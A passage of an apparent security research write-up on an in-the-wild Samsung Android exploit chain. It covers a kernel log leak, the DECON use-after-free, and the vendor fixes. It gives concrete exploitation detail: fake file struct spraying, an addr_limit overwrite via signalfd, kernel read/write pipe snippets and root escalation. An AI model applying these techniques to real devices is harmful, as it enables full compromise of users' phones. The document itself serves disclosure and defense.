<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74


The file /data/log/sec_log.log has the SELinux context dumplog_data_file, which is accessible to many apps as shown below. The exploit is running within the SamsungTTS app, which runs in the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can read the same contents once they are copied to sec_log.log, which has more permissive access.


$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app


allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };


allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.

  • Removed the bugreport service from dumpstate.rc.


In addition, a few changes made earlier in 2020 would, once included, prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM released version r21p0 of the Mali driver, which replaced the WARN_ON with the more appropriate pr_warn, which does not log a full backtrace. The March 2021 Samsung firmware updated the Mali driver from version r19p0 to r26p0, which uses pr_warn instead of WARN_ON.

  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.


Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access. 



Find the PID of android.hardware.graphics.composer

To trigger the vulnerability, the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.


The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:


stream lids=0,3,4


The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.


Now it has the PID of android.hardware.graphics.composer, the Hardware Composer HAL.


Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path. 


Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes. 


/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif


        wait_queue_head_t       wq;

        unsigned long           flags;


        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};


The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.


static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;


[...]


        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {


[...]


        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


[...]


        return ret;

}


In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.


int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;


        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;


        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));


        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }


        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }


        return fd;

}


The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 


void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;


        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;


                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }


                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}


decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.


When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.


        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


        decon_hiber_block(decon);


        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);


        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);


+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);


        mutex_unlock(&decon->lock);
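
To make the ordering issue concrete, here is a small userspace toy model of the reference counting involved. It is not kernel code: struct toy_file, toy_get_file, toy_fput and toy_set_win_config are hypothetical stand-ins, and the "race" is reduced to a flag saying whether userspace closes the retire fence as soon as it can.

```c
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for the kernel's struct file: a refcount and a flag. */
struct toy_file {
    int  refcount;
    bool freed;
};

/* Set when the model touches a toy_file after its last reference is gone. */
static bool uaf_detected;

static void toy_get_file(struct toy_file *f)
{
    if (f->freed)
        uaf_detected = true;    /* the kernel would be using freed memory */
    f->refcount++;
}

static void toy_fput(struct toy_file *f)
{
    if (--f->refcount == 0)
        f->freed = true;
}

/* Models the tail of decon_set_win_config. `install_first` selects the
 * vulnerable ordering (fd_install before decon_create_release_fences).
 * `user_closes_early` models userspace calling close() on the retire
 * fence the moment the fd becomes visible. Returns true if the model
 * touched a freed file. */
bool toy_set_win_config(bool install_first, bool user_closes_early)
{
    /* sync_file_create leaves the file with a single reference. */
    struct toy_file file = { .refcount = 1, .freed = false };
    uaf_detected = false;

    if (install_first) {
        /* fd_install: the fd table now owns the only reference. */
        if (user_closes_early)
            toy_fput(&file);    /* close(retire_fence) */
        toy_get_file(&file);    /* decon_create_release_fences */
    } else {
        toy_get_file(&file);    /* decon_create_release_fences */
        /* fd_install happens last; userspace can only close from here. */
        if (user_closes_early)
            toy_fput(&file);    /* close(retire_fence) */
    }
    return uaf_detected;
}
```

In this model only the combination of the old ordering and an early close reports a use-after-free, which mirrors why moving fd_install to the end of the function is sufficient.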

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:


fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;


The f_op member is set to signalfd_fops for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address, also leaked using vulnerability #2.


The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver. 

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};


#define KBASE_IOCTL_MEM_PROFILE_ADD \

        _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)


static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;


        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }


        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;


        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }


        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}



This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.


Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, they only apply to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020, so it makes sense that the exploit targeted devices that launched on Android 10 or earlier, where DebugFS would have been mounted.



For example, on the A51 Exynos device (SM-A515F), which launched on Android 10, CONFIG_DEBUG_FS is enabled and DebugFS is mounted.


a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y


a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0


Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.


#ifdef CONFIG_DEBUG_FS


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;


        mutex_lock(&kctx->mem_profile_lock);


        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }


        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }


        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        mutex_unlock(&kctx->mem_profile_lock);


        return err;

}



#else /* CONFIG_DEBUG_FS */


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */


By writing the fake file structs as a single 0x2000-byte buffer rather than as 25 individual 0x140-byte buffers, the exploit writes its fake structs across two whole pages, which increases the odds of reallocating over the freed file struct.
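
The size arithmetic can be checked with a short sketch: 0x2000 / 0x140 leaves room for 25 whole structs (0x1F40 bytes) plus a 0xC0-byte tail. The function below tiles one fake struct across such a buffer. Laying the copies out back to back is an assumption made for illustration, and fill_spray_buffer is a hypothetical name; the exploit's exact layout is not shown.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FAKE_FILE_SIZE 0x140u   /* size of struct file on this kernel, per the text */
#define SPRAY_BUF_SIZE 0x2000u  /* two 4 KiB pages */

/* Tile `fake` (FAKE_FILE_SIZE bytes) across `buf` back to back and zero
 * the leftover tail. Returns the number of whole copies written.
 * (Hypothetical helper; back-to-back tiling is an assumption.) */
size_t fill_spray_buffer(uint8_t buf[SPRAY_BUF_SIZE],
                         const uint8_t fake[FAKE_FILE_SIZE])
{
    size_t n = SPRAY_BUF_SIZE / FAKE_FILE_SIZE;

    for (size_t i = 0; i < n; i++)
        memcpy(buf + i * FAKE_FILE_SIZE, fake, FAKE_FILE_SIZE);
    memset(buf + n * FAKE_FILE_SIZE, 0, SPRAY_BUF_SIZE - n * FAKE_FILE_SIZE);
    return n;
}
```

The resulting buffer is what would be passed, with len set to 0x2000, as the buffer argument of the MEM_PROFILE_ADD ioctl.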


The exploit then calls dup2 on the dangling fds. The dup2 syscall opens another fd on the same open file structure that the original points to. In this case, the exploit calls dup2 to verify that it successfully reallocated a fake file structure in the same place as the freed file structure. dup2 increments the reference count (f_count) in the file structure. In all of the fake file structures, f_count was set to 0x7F, so if any of them is incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.


To determine whether any of the file structs’ refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
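
A sketch of that check over one mem_profile dump is shown below. It looks at a fixed offset inside each 0x140-byte slot rather than scanning for 0x80 anywhere, since kernel pointers in the fake struct may themselves contain that byte. The function name find_bumped_slot and the count_off parameter are hypothetical: the real offset of f_count depends on the kernel build and is not given in the text.

```c
#include <stddef.h>
#include <stdint.h>

/* Treat `data` as consecutive `stride`-sized slots and return the index
 * of the first slot whose byte at `count_off` equals `bumped`, or -1 if
 * no slot matches. (Hypothetical helper; `count_off` stands in for the
 * build-specific offset of the low byte of f_count.) */
long find_bumped_slot(const uint8_t *data, size_t len,
                      size_t stride, size_t count_off, uint8_t bumped)
{
    if (stride == 0 || count_off >= stride)
        return -1;

    for (size_t base = 0; base + stride <= len; base += stride) {
        if (data[base + count_off] == bumped)
            return (long)(base / stride);
    }
    return -1;
}
```

A non-negative result identifies which sprayed copy now backs the dangling fd; a result of -1 means the spray missed and would need to be repeated.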

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  


Userspace operations only access addresses below the addr_limit. Therefore, by overwriting the addr_limit with a higher value, we make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.


signalfd(dangling_fd, 0xFFFFFF8000000000, 8);


According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).


int signalfd(int fd, const sigset_t *mask, int flags);


The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the sigmask of the signalfd_ctx struct.


typedef unsigned long sigset_t;


struct signalfd_ctx {

        sigset_t sigmask;

};


The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.


Let’s walk through how the signalfd source code updates the mask: 


SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;


        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);


        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;


        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]


        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;


                ctx->sigmask = sigmask;


                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);


                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }


        return ufd;

}


First the function modifies the mask that was passed in. The mask passed into the function is the set of signals that should be accepted via the file descriptor, but the sigmask member of the signalfd_ctx struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] make this change. The call to sigdelsetmask ensures that the SIGKILL and SIGSTOP signals are always blocked: it clears bit 8 (SIGKILL) and bit 18 (SIGSTOP) so that they are set by the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).


The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer. 


The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals signalfd_fops. This is why the f_op was set to signalfd_fops in the previous section. Finally at [6], the overwrite occurs. The transformed mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.


The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000, so the value written is ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFBFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit with USER_DS rather than KERNEL_DS in the next section.
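
The mask transformation is easy to reproduce in isolation. The sketch below mirrors the sigdelsetmask and signotset steps on a plain 64-bit integer; signalfd_stored_mask is a hypothetical name, and the bit positions follow from sigmask(sig) being 1 << (sig - 1) with SIGKILL = 9 and SIGSTOP = 19.

```c
#include <stdint.h>

#define SIGKILL_BIT (1ULL << 8)   /* sigmask(SIGKILL): signal 9  -> bit 8  */
#define SIGSTOP_BIT (1ULL << 18)  /* sigmask(SIGSTOP): signal 19 -> bit 18 */

/* Compute the value signalfd stores in ctx->sigmask for a given
 * user-supplied mask. (Hypothetical helper modelling the two calls
 * at [1] on a 64-bit sigset_t.) */
uint64_t signalfd_stored_mask(uint64_t user_mask)
{
    uint64_t m = user_mask & ~(SIGKILL_BIT | SIGSTOP_BIT);  /* sigdelsetmask */
    return ~m;                                              /* signotset */
}
```

Passing 0xFFFFFF8000000000 yields 0x7FFFFFFFFF (USER_DS), and passing 0 yields 0xFFFFFFFFFFFFFFFF (KERNEL_DS). Because bits 8 and 18 are always set in the result, only values with those two bits set can be written this way; both USER_DS and KERNEL_DS satisfy that.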

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.


It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.


void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}


This technique works by first writing the contents of the buffer that you’d like written into one end of the pipe. By then calling read on the other end and passing in the kernel address you’d like to write to, those contents are written to that kernel memory address.
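
The data flow of the pipe round trip can be demonstrated entirely in userspace. The sketch below copies between two ordinary user buffers, so it shows only how the bytes move; it does not touch the addr_limit and cannot reach kernel memory. The name copy_via_pipe is hypothetical.

```c
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Copy `len` bytes from `src` to `dst` by way of a pipe: write() moves
 * the bytes into the pipe buffer, read() moves them out to `dst`.
 * Returns 0 on success, -1 on failure. (Hypothetical helper; in the
 * technique described above, `dst` would be a kernel address.) */
int copy_via_pipe(void *dst, const void *src, size_t len)
{
    int p[2];
    int ok = -1;

    /* Stay within one page, like the proof-of-concept above. */
    if (len > 0x1000 || pipe(p) != 0)
        return -1;

    if (write(p[1], src, len) == (ssize_t)len &&
        read(p[0], dst, len) == (ssize_t)len)
        ok = 0;

    close(p[0]);
    close(p[1]);
    return ok;
}
```

The kernel performs the copy into `dst` on behalf of the process, which is why the destination check against addr_limit is the only thing standing between read() and a kernel address.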


With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.


Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.


The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it is not.


/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}


The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:


kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]             

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}


The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the contents of the buffer to the pipe. The USER_DS value is written to the pipe at [2].


The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit. 


Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.


I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit. 

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.



As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of a different attack surface and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety issues. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 were not memory corruption vulnerabilities.


The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers, despite running at such a privileged level. This highlights an area for further research.


Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know. 


The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage. 


